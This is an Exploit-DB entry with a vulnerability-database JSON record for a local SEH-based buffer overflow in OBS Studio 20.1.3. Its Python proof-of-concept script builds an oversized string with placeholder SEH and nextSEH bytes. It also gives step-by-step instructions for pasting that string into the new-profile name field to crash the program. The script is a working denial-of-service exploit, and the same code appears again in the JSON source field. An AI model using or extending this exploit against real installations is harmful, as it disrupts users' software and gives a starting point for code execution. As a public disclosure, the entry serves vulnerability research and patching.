ID EDB-ID:43596
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-15T00:00:00
Description
OBS Studio 20.1.3 - Local Buffer Overflow. Dos exploit for Windows platform
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
# Date: 2018.01.15
# Exploit Author: Greg Priest
# Version: OBS-Studio-20.1.3
# Tested on: Windows7 x64 HUN/ENG Enterprise
# Software Download Link: https://obsproject.com/download
'''
bug = '''
Vulnerable input field:
<1> Copy printed "AAAAA...." string to clipboard!
<2> Profile -> New
<3> Paste the string in the input then press Ok
'''
junk = "A" * 459
SEH = "BBBB"
nextSEH = "CCCC"
overflow = "D" * 19533
print author
print "String: ", junk + SEH + nextSEH + overflow
print bug
{"id": "EDB-ID:43596", "bulletinFamily": "exploit", "title": "OBS Studio 20.1.3 - Local Buffer Overflow", "description": "OBS Studio 20.1.3 - Local Buffer Overflow. Dos exploit for Windows platform", "published": "2018-01-15T00:00:00", "modified": "2018-01-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43596/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "type": "exploitdb", "lastseen": "2018-01-24T14:22:13", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "ba1b2ce341203ba48a57062fb145b5b6"}, {"key": "href", "hash": "8b4143e0dd39a936a9bd040814c964a4"}, {"key": "modified", "hash": "3fcf3472ec23d37b4712de598fcb8d16"}, {"key": "osvdbidlist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "published", "hash": "3fcf3472ec23d37b4712de598fcb8d16"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "sourceData", "hash": "09a66392801f051e4abbe94a9d3d568e"}, {"key": "sourceHref", "hash": "e11bd63c3119a28d62e17b3fb2a6d8f6"}, {"key": "title", "hash": "609ba93956351a71680c72fce6d85876"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "hash": "65d7a1531001f1c3c5b4d94dc14b77c55a74797f14743c79c721218d8a7b9425", "viewCount": 0, "enchantments": {"vulnersScore": 2.8}, "objectVersion": "1.3", "sourceHref": "https://www.exploit-db.com/download/43596/", "sourceData": "author = '''\r\n \r\n ##############################################\r\n # Created: ScrR1pTK1dd13 #\r\n # Name: Greg Priest #\r\n # Mail: ScR1pTK1dd13.slammer@gmail.com # \r\n ##############################################\r\n \r\n# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)\r\n# Date: 2018.01.15\r\n# Exploit Author: Greg Priest\r\n# Version: OBS-Studio-20.1.3\r\n# Tested on: Windows7 x64 HUN/ENG Enterprise\r\n# Software Download Link: https://obsproject.com/download\r\n\r\n'''\r\n\r\nbug = '''\r\nVulnerable input field:\r\n<1> Copy printed \"AAAAA....\" string to clipboard!\r\n<2> Profile -> New\r\n<3> Paste the string in the input then press Ok\r\n\r\n'''\r\njunk = \"A\" * 459\r\nSEH = \"BBBB\"\r\nnextSEH = \"CCCC\"\r\noverflow = \"D\" * 19533\r\n\r\nprint author\r\nprint \"String: \", junk + SEH + nextSEH + overflow\r\nprint bug", "osvdbidlist": []}
{"result": {}}